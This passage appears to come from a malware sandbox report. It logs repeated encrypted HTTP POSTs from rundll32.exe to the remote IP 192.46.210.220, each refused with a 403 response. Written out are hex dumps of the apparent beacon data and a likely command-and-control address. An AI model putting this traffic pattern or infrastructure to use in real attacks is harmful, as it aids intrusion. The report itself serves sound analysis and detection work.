                                                                                                        2021-10-28 02:46:35 UTC223OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:36 UTC233INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:36 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        46192.168.2.549975192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:35 UTC228OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:35 UTC228OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:36 UTC233INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:36 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        47192.168.2.549982192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:39 UTC233OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:39 UTC233OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:40 UTC243INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:40 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        48192.168.2.549983192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:39 UTC238OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:39 UTC238OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:40 UTC243INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:40 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        49192.168.2.549990192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:44 UTC243OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:44 UTC243OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:44 UTC253INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:44 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        5192.168.2.549776192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:15 UTC24OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:15 UTC24OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:16 UTC34INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:16 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        50192.168.2.549991192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:44 UTC248OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:44 UTC248OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:44 UTC253INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:44 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        51192.168.2.549998192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:47 UTC253OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:47 UTC253OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:48 UTC263INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:48 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        52192.168.2.549999192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:48 UTC258OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:48 UTC258OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:48 UTC263INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:48 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        53192.168.2.550006192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:51 UTC263OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:51 UTC263OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:52 UTC273INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:52 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        54192.168.2.550007192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:52 UTC268OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:52 UTC268OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:52 UTC273INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:52 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        55192.168.2.550014192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:55 UTC273OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:55 UTC273OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:56 UTC283INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:56 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        56192.168.2.550015192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:56 UTC278OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:56 UTC278OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:56 UTC283INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:56 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        57192.168.2.550022192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:59 UTC283OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
